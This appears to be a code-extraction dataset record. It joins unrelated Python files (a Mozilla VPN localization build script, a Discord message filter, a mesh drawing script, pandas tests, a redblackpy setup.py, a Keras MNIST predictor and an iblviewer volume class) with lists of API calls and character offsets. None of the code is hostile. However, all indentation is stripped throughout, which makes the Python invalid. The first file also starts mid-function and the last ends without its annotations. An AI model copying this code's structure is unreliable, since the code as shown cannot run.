global stepnum
print(f"\033[96m\033[1mStep {stepnum}\033[0m: \033[97m{text}\033[0m")
stepnum = stepnum+1
# Step 0
title("Find the Qt localization tools...")
def qtquery(qmake, propname):
try:
qtquery = os.popen(f'{qmake} -query {propname}')
qtpath = qtquery.read().strip()
if len(qtpath) > 0:
return qtpath
finally:
pass
return None
qtbinpath = args.qtpath
if qtbinpath is None:
qtbinpath = qtquery('qmake', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake6', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake5', 'QT_INSTALL_BINS')
if qtbinpath is None:
qtbinpath = qtquery('qmake-qt5', 'QT_INSTALL_BINS')
if qtbinpath is None:
print('Unable to locate qmake tool.')
sys.exit(1)
if not os.path.isdir(qtbinpath):
print(f"QT path is not a diretory: {qtbinpath}")
sys.exit(1)
lupdate = os.path.join(qtbinpath, 'lupdate')
lconvert = os.path.join(qtbinpath, 'lconvert')
lrelease = os.path.join(qtbinpath, 'lrelease')
# Step 0
# Let's update the i18n repo
os.system(f"git submodule init")
os.system(f"git submodule update --remote --depth 1 i18n")
# Step 1
# Go through the i18n repo, check each XLIFF file and take
# note which locale is complete above the minimum threshold.
# Adds path of .xliff and .ts to l10n_files.
title("Validate the XLIFF file...")
l10n_files = []
for locale in os.listdir('i18n'):
# Skip non folders
if not os.path.isdir(os.path.join('i18n', locale)):
continue
# Skip hidden folders
if locale.startswith('.'):
continue
xliff_path = os.path.join('i18n', locale, 'mozillavpn.xliff')
# If it's the source locale (en), ignore parsing for completeness and
# add it to the list.
if locale == 'en':
print(f'OK\t- en added (reference locale)')
l10n_files.append({
'locale': 'en',
'ts': os.path.join('translations', 'generated', 'mozillavpn_en.ts'),
'xliff': xliff_path
})
continue
tree = ET.parse(xliff_path)
root = tree.getroot()
sources = 0
translations = 0
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}source'):
sources += 1
for element in root.iter('{urn:oasis:names:tc:xliff:document:1.2}target'):
translations += 1
completeness = translations/(sources*1.0)
# Ignore locale with less than 70% of completeness
if completeness < l10n_threshold:
print(f'KO\t- {locale} is translated at {round(completeness*100, 2)}%, at least {l10n_threshold*100}% is needed')
continue # Not enough translations next file please
print(f'OK\t- {locale} added ({round(completeness*100, 2)}% translated)')
l10n_files.append({
'locale': locale,
'ts': os.path.join('translations', 'generated', f'mozillavpn_{locale}.ts'),
'xliff': xliff_path
})
# Step 2
title("Create folders and localization files for the languages...")
for file in l10n_files:
locdirectory = os.path.join('translations', 'generated', file['locale'])
os.makedirs(locdirectory, exist_ok=True)
locversion = os.path.join(locdirectory, f'locversion.plist')
with open(locversion, 'w') as locversion_file:
locversion_file.write(f"""<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>LprojCompatibleVersion</key>
<string>123</string>
<key>LprojLocale</key>
<string>{file['locale']}</string>
<key>LprojRevisionLevel</key>
<string>1</string>
<key>LprojVersion</key>
<string>123</string>
</dict>
</plist>""")
with open(os.path.join('translations', 'generated', 'macos.pri'), 'w') as macospri:
macospri.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
for file in l10n_files:
macospri.write(f"LANGUAGES_FILES_{file['locale']}.files += $$PWD/{file['locale']}/locversion.plist\n")
macospri.write(f"LANGUAGES_FILES_{file['locale']}.path = Contents/Resources/{file['locale']}.lproj\n")
macospri.write(f"QMAKE_BUNDLE_DATA += LANGUAGES_FILES_{file['locale']}\n\n")
# Step 3
title("Write resource file to import the locales that are ready...")
with open('translations/generated/translations.qrc', 'w') as qrcfile:
qrcfile.write('<!-- AUTOGENERATED! DO NOT EDIT!! -->\n')
qrcfile.write('<RCC>\n')
qrcfile.write(' <qresource prefix="/i18n">\n')
for file in l10n_files:
qrcfile.write(f' <file>mozillavpn_{file["locale"]}.qm</file>\n')
qrcfile.write(' </qresource>\n')
qrcfile.write('</RCC>\n')
# Step 4
title("Generate the Js/C++ string definitions...")
try:
subprocess.call([sys.executable, os.path.join('scripts', 'utils', 'generate_strings.py'),
'-o', os.path.join('translations', 'generated'),
os.path.join('translations', 'strings.yaml')])
except Exception as e:
print("generate_strings.py failed. Try with:\n\tpip3 install -r requirements.txt --user")
print(e)
exit(1)
# Build a dummy project to glob together everything that might contain strings.
title("Scanning for new strings...")
def scan_sources(projfile, dirpath):
projfile.write(f"HEADERS += $$files({dirpath}/*.h, true)\n")
projfile.write(f"SOURCES += $$files({dirpath}/*.cpp, true)\n")
projfile.write(f"RESOURCES += $$files({dirpath}/*.qrc, true)\n\n")
with open('translations/generated/dummy.pro', 'w') as dummyproj:
dummyproj.write('### AUTOGENERATED! DO NOT EDIT!! ###\n')
dummyproj.write(f"HEADERS += l18nstrings.h\n")
dummyproj.write(f"SOURCES += l18nstrings_p.cpp\n")
dummyproj.write(f"SOURCES += ../l18nstrings.cpp\n\n")
for l10n_file in l10n_files:
dummyproj.write(f"TRANSLATIONS += {os.path.basename(l10n_file['ts'])}\n")
dummyproj.write("\n")
scan_sources(dummyproj, '../../src')
scan_sources(dummyproj, '../../nebula')
# Step 5
title("Generate translation resources...")
for l10n_file in l10n_files:
os.system(f"{lconvert} -if xlf -i {l10n_file['xliff']} -o {l10n_file['ts']}")
os.system(f"{lupdate} translations/generated/dummy.pro")
for l10n_file in l10n_files:
os.system(f"{lrelease} -idbased {l10n_file['ts']}")
print(f'Imported {len(l10n_files)} locales')
git = os.popen(f'git submodule status i18n')
git_commit_hash = git.read().strip().replace("+","").split(' ')[0]
print(f'Current commit: https://github.com/mozilla-l10n/mozilla-vpn-client-l10n/commit/{git_commit_hash}')
| [
"os.listdir",
"xml.etree.ElementTree.parse",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.join",
"os.getcwd",
"os.chdir",
"os.path.dirname",
"os.popen",
"os.path.isdir",
"os.path.basename",
"sys.exit",
"os.system",
"atexit.register"
]
| [((401, 412), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (410, 412), False, 'import os\n'), ((475, 492), 'os.chdir', 'os.chdir', (['workdir'], {}), '(workdir)\n', (483, 492), False, 'import os\n'), ((493, 527), 'atexit.register', 'atexit.register', (['os.chdir', 'prevdir'], {}), '(os.chdir, prevdir)\n', (508, 527), False, 'import atexit\n'), ((630, 655), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (653, 655), False, 'import argparse\n'), ((1905, 1939), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lupdate"""'], {}), "(qtbinpath, 'lupdate')\n", (1917, 1939), False, 'import os\n'), ((1951, 1986), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lconvert"""'], {}), "(qtbinpath, 'lconvert')\n", (1963, 1986), False, 'import os\n'), ((1998, 2033), 'os.path.join', 'os.path.join', (['qtbinpath', '"""lrelease"""'], {}), "(qtbinpath, 'lrelease')\n", (2010, 2033), False, 'import os\n'), ((2073, 2105), 'os.system', 'os.system', (['f"""git submodule init"""'], {}), "(f'git submodule init')\n", (2082, 2105), False, 'import os\n'), ((2106, 2164), 'os.system', 'os.system', (['f"""git submodule update --remote --depth 1 i18n"""'], {}), "(f'git submodule update --remote --depth 1 i18n')\n", (2115, 2164), False, 'import os\n'), ((2406, 2424), 'os.listdir', 'os.listdir', (['"""i18n"""'], {}), "('i18n')\n", (2416, 2424), False, 'import os\n'), ((7168, 7224), 'os.system', 'os.system', (['f"""{lupdate} translations/generated/dummy.pro"""'], {}), "(f'{lupdate} translations/generated/dummy.pro')\n", (7177, 7224), False, 'import os\n'), ((7363, 7401), 'os.popen', 'os.popen', (['f"""git submodule status i18n"""'], {}), "(f'git submodule status i18n')\n", (7371, 7401), False, 'import os\n'), ((436, 461), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (451, 461), False, 'import os\n'), ((1779, 1790), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1787, 1790), False, 'import sys\n'), ((1799, 1823), 'os.path.isdir', 'os.path.isdir', (['qtbinpath'], {}), '(qtbinpath)\n', (1812, 1823), False, 'import os\n'), ((1882, 1893), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1890, 1893), False, 'import sys\n'), ((2615, 2663), 'os.path.join', 'os.path.join', (['"""i18n"""', 'locale', '"""mozillavpn.xliff"""'], {}), "('i18n', locale, 'mozillavpn.xliff')\n", (2627, 2663), False, 'import os\n'), ((3049, 3069), 'xml.etree.ElementTree.parse', 'ET.parse', (['xliff_path'], {}), '(xliff_path)\n', (3057, 3069), True, 'import xml.etree.ElementTree as ET\n'), ((4033, 4090), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', "file['locale']"], {}), "('translations', 'generated', file['locale'])\n", (4045, 4090), False, 'import os\n'), ((4095, 4135), 'os.makedirs', 'os.makedirs', (['locdirectory'], {'exist_ok': '(True)'}), '(locdirectory, exist_ok=True)\n', (4106, 4135), False, 'import os\n'), ((4153, 4200), 'os.path.join', 'os.path.join', (['locdirectory', 'f"""locversion.plist"""'], {}), "(locdirectory, f'locversion.plist')\n", (4165, 4200), False, 'import os\n'), ((7090, 7167), 'os.system', 'os.system', (['f"""{lconvert} -if xlf -i {l10n_file[\'xliff\']} -o {l10n_file[\'ts\']}"""'], {}), '(f"{lconvert} -if xlf -i {l10n_file[\'xliff\']} -o {l10n_file[\'ts\']}")\n', (7099, 7167), False, 'import os\n'), ((7258, 7309), 'os.system', 'os.system', (['f"""{lrelease} -idbased {l10n_file[\'ts\']}"""'], {}), '(f"{lrelease} -idbased {l10n_file[\'ts\']}")\n', (7267, 7309), False, 'import os\n'), ((1211, 1249), 'os.popen', 'os.popen', (['f"""{qmake} -query {propname}"""'], {}), "(f'{qmake} -query {propname}')\n", (1219, 1249), False, 'import os\n'), ((4746, 4800), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', '"""macos.pri"""'], {}), "('translations', 'generated', 'macos.pri')\n", (4758, 4800), False, 'import os\n'), ((2474, 2502), 'os.path.join', 'os.path.join', (['"""i18n"""', 'locale'], {}), "('i18n', locale)\n", (2486, 2502), False, 'import os\n'), ((3807, 3875), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', 'f"""mozillavpn_{locale}.ts"""'], {}), "('translations', 'generated', f'mozillavpn_{locale}.ts')\n", (3819, 3875), False, 'import os\n'), ((5790, 5845), 'os.path.join', 'os.path.join', (['"""scripts"""', '"""utils"""', '"""generate_strings.py"""'], {}), "('scripts', 'utils', 'generate_strings.py')\n", (5802, 5845), False, 'import os\n'), ((5874, 5915), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""'], {}), "('translations', 'generated')\n", (5886, 5915), False, 'import os\n'), ((5938, 5982), 'os.path.join', 'os.path.join', (['"""translations"""', '"""strings.yaml"""'], {}), "('translations', 'strings.yaml')\n", (5950, 5982), False, 'import os\n'), ((2914, 2975), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', '"""mozillavpn_en.ts"""'], {}), "('translations', 'generated', 'mozillavpn_en.ts')\n", (2926, 2975), False, 'import os\n'), ((6853, 6886), 'os.path.basename', 'os.path.basename', (["l10n_file['ts']"], {}), "(l10n_file['ts'])\n", (6869, 6886), False, 'import os\n')] |
from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
| [
"discord.ext.commands.Cog.listener",
"discord.Embed",
"discord.Colour.red"
]
| [((300, 323), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (321, 323), False, 'from discord.ext import commands\n'), ((669, 684), 'discord.Embed', 'discord.Embed', ([], {}), '()\n', (682, 684), False, 'import discord\n'), ((708, 728), 'discord.Colour.red', 'discord.Colour.red', ([], {}), '()\n', (726, 728), False, 'import discord\n')] |
import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| [
"os.path.dirname",
"compas_rhino.artists.MeshArtist",
"os.path.join",
"compas.datastructures.Mesh.from_obj"
]
| [((116, 141), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (131, 141), False, 'import os\n'), ((149, 175), 'os.path.join', 'os.path.join', (['HERE', '"""data"""'], {}), "(HERE, 'data')\n", (161, 175), False, 'import os\n'), ((183, 214), 'os.path.join', 'os.path.join', (['DATA', '"""faces.obj"""'], {}), "(DATA, 'faces.obj')\n", (195, 214), False, 'import os\n'), ((223, 242), 'compas.datastructures.Mesh.from_obj', 'Mesh.from_obj', (['FILE'], {}), '(FILE)\n', (236, 242), False, 'from compas.datastructures import Mesh\n'), ((253, 283), 'compas_rhino.artists.MeshArtist', 'MeshArtist', (['mesh'], {'layer': '"""Mesh"""'}), "(mesh, layer='Mesh')\n", (263, 283), False, 'from compas_rhino.artists import MeshArtist\n')] |
"""Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| [
"pytest.mark.skip",
"tests.conftest.create_dataframe"
]
| [((1278, 1315), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1294, 1315), False, 'import pytest\n'), ((1603, 1640), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1619, 1640), False, 'import pytest\n'), ((1713, 1750), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1729, 1750), False, 'import pytest\n'), ((1826, 1863), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1842, 1863), False, 'import pytest\n'), ((637, 836), 'tests.conftest.create_dataframe', 'create_dataframe', (["[('a', 'b', 'c', 'number'), ('bones', 'femur', 'tendons', 24), ('bones',\n 'humerus', 'tendons', 14), ('cars', None, None, 7), ('muscles',\n 'gluteus_maximus', 'tendons', 18)]"], {}), "([('a', 'b', 'c', 'number'), ('bones', 'femur', 'tendons', \n 24), ('bones', 'humerus', 'tendons', 14), ('cars', None, None, 7), (\n 'muscles', 'gluteus_maximus', 'tendons', 18)])\n", (653, 836), False, 'from tests.conftest import create_dataframe\n'), ((1164, 1201), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1180, 1201), False, 'import pytest\n'), ((1471, 1508), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1487, 1508), False, 'import pytest\n')] |
#
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
'core/tree/rb_tree.tpp'
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| [
"Cython.Build.cythonize",
"platform.mac_ver",
"rbp_setup_tools.code_generation.generate_from_cython_src",
"platform.system",
"distutils.extension.Extension"
]
| [((1740, 1796), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_1', 'output_1', 'TYPES[:-1]', '(0)'], {}), '(src_1, output_1, TYPES[:-1], 0)\n', (1764, 1796), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1797, 1849), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_2', 'output_2', 'TYPES', '(14)'], {}), '(src_2, output_2, TYPES, 14)\n', (1821, 1849), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1850, 1901), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_3', 'output_3', 'TYPES', '(0)'], {}), '(src_3, output_3, TYPES, 0)\n', (1874, 1901), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1902, 1953), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_4', 'output_4', 'TYPES', '(0)'], {}), '(src_4, output_4, TYPES, 0)\n', (1926, 1953), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((374, 391), 'platform.system', 'platform.system', ([], {}), '()\n', (389, 391), False, 'import platform\n'), ((2189, 2601), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.series.tree_series"""'], {'sources': "['redblackpy/series/tree_series.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']", 'depends': "['core/tree/tree.hpp', 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp']"}), "('redblackpy.series.tree_series', sources=[\n 'redblackpy/series/tree_series.pyx'], extra_compile_args=compile_opts,\n extra_link_args=compile_opts[:-1], language='c++', include_dirs=[\n './redblackpy'], depends=['core/tree/tree.hpp',\n 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp'])\n", (2198, 2601), False, 'from distutils.extension import Extension\n'), ((2927, 3347), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.series.series_iterator"""'], {'sources': "['redblackpy/series/series_iterator.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']", 'depends': "['core/tree/tree.hpp', 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp']"}), "('redblackpy.series.series_iterator', sources=[\n 'redblackpy/series/series_iterator.pyx'], extra_compile_args=\n compile_opts, extra_link_args=compile_opts[:-1], language='c++',\n include_dirs=['./redblackpy'], depends=['core/tree/tree.hpp',\n 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp'])\n", (2936, 3347), False, 'from distutils.extension import Extension\n'), ((3687, 3899), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.benchmark.timer"""'], {'sources': "['redblackpy/benchmark/timer.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']"}), "('redblackpy.benchmark.timer', sources=[\n 'redblackpy/benchmark/timer.pyx'], extra_compile_args=compile_opts,\n extra_link_args=compile_opts[:-1], language='c++', include_dirs=[\n './redblackpy'])\n", (3696, 3899), False, 'from distutils.extension import Extension\n'), ((561, 578), 'platform.system', 'platform.system', ([], {}), '()\n', (576, 578), False, 'import platform\n'), ((4065, 4087), 'Cython.Build.cythonize', 'cythonize', (['ext_modules'], {}), '(ext_modules)\n', (4074, 4087), False, 'from Cython.Build import cythonize\n'), ((667, 684), 'platform.system', 'platform.system', ([], {}), '()\n', (682, 684), False, 'import platform\n'), ((498, 516), 'platform.mac_ver', 'platform.mac_ver', ([], {}), '()\n', (514, 516), False, 'import platform\n'), ((858, 875), 'platform.system', 'platform.system', ([], {}), '()\n', (873, 875), False, 'import platform\n')] |
import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('准备的图片的shape:',number.flatten().shape)
print('原number:',number)
number = number.astype('float32')
number = number/255 #归一化
number = number.flatten()
print('处理过后的number.shape:',number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
#print('测试标签为:',test_target[8000]) | [
"numpy.array",
"PIL.Image.open",
"keras.models.load_model"
]
| [((89, 111), 'PIL.Image.open', 'Image.open', (['"""1002.png"""'], {}), "('1002.png')\n", (99, 111), False, 'from PIL import Image\n'), ((121, 139), 'numpy.array', 'np.array', (['img_gray'], {}), '(img_gray)\n', (129, 139), True, 'import numpy as np\n'), ((367, 393), 'keras.models.load_model', 'load_model', (['"""mnist-dnn.h5"""'], {}), "('mnist-dnn.h5')\n", (377, 393), False, 'from keras.models import load_model\n'), ((535, 553), 'numpy.array', 'np.array', (['[number]'], {}), '([number])\n', (543, 553), True, 'import numpy as np\n')] |
from dataclasses import dataclass, field
from typing import Mapping, List, Any
from datetime import datetime
import logging
import pandas as pd
import glob
import numpy as np
import logging
import os
from collections import OrderedDict
import nrrd
import vtk
import vedo
from vtk.util.numpy_support import numpy_to_vtk
from iblviewer.collection import Collection
import iblviewer.objects as obj
import iblviewer.utils as utils
@dataclass
class VolumeModel:
RAW = 'raw'
SEGMENTED = 'segmented'
NORMALIZED_SUFFIX = '_norm'
DATA_TYPE = {RAW:0, SEGMENTED:1}
PREFIX = 'Volume'
__count = 0
def unique_name():
VolumeModel.__count += 1
return f'{VolumeModel.PREFIX}_{VolumeModel.__count}'
name: str = field(default_factory=unique_name)
file_path: str = None
scalars: Collection = field(default_factory=Collection)
axes: List = field(default_factory=lambda: [1, 1, 1])
data_min: float = None
data_max: float = None
data_map_step: float = 1.0
data: np.ndarray = None
data_type: str = RAW
resolution: int = 1
# Default units are microns.
units: float = 1e-06
base_color_map: Any = None
# At IBL, volume mappings are used from ibllib: ibllib.atlas.regions.mappings
mapping_name: str = None
lateralized: bool = False
# Mapping function. If None, the volume will be given as it is.
mapping: Any = None
luts: Collection = field(default_factory=Collection)
slicers: Collection = field(default_factory=Collection)
isosurfaces: Collection = field(default_factory=Collection)
interactive_subsampling: bool = True
volume_visible: bool = True
slices_visible: bool = True
transpose_shape: Any = None
dimensions: np.ndarray = np.zeros(3).astype(float)
center: np.ndarray = np.zeros(3).astype(float)
def compute_size(self):
"""
Compute volume size
"""
if self.data is None:
return
self.dimensions = np.array(self.data.shape)[:3]
if self.resolution is None:
return
self.resolution = int(self.resolution) # TODO: move this to constructor or init
self.dimensions *= self.resolution
self.center = np.ones(3) * self.resolution / 2 + self.dimensions / 2
def compute_range(self, force=False):
"""
Compute min and max range in the volume
:return: Min and max values
"""
if self.data_min is not None and self.data_max is not None and not force:
return self.data_min, self.data_max
self.data_min = np.min(self.data)
self.data_max = np.max(self.data)
#print('Volume min-max', self.data_min, self.data_max)
return self.data_min, self.data_max
def guess_volume_type(self):
"""
Infer the volume type when it was not specified by the user.
We assume here that typical values between -1 and 1 are raw volumes.
"""
if self.data_type is None:
if self.data_min is None or self.data_max is None:
self.compute_range()
if self.data_min >= -1 and self.data_max <= 1:
guess = VolumeModel.RAW
else:
guess = VolumeModel.SEGMENTED
self.data_type = guess
def is_segmented(self, auto_guess=True):
"""
Get whether current volume/image is segmented
:return: Boolean
"""
if self.data_type is None and auto_guess:
self.guess_volume_type()
return self.data_type == VolumeModel.SEGMENTED
def read_volume(self, file_path):
"""
Read local volume. Downloads the file first if it's remote.
:param file_path: Volume path
:return: 3D array
"""
if file_path.startswith('http') or file_path.startswith('ftp'):
downloaded_temp_file_path = vedo.download(file_path, verbose=False)
if file_path.endswith('nrrd'):
data, header = nrrd.read(downloaded_temp_file_path)
else:
data = vedo.loadImageData(downloaded_temp_file_path)
else:
if file_path.endswith('nrrd'):
data, header = nrrd.read(file_path, index_order='C')
else:
data = vedo.loadImageData(file_path)
return data
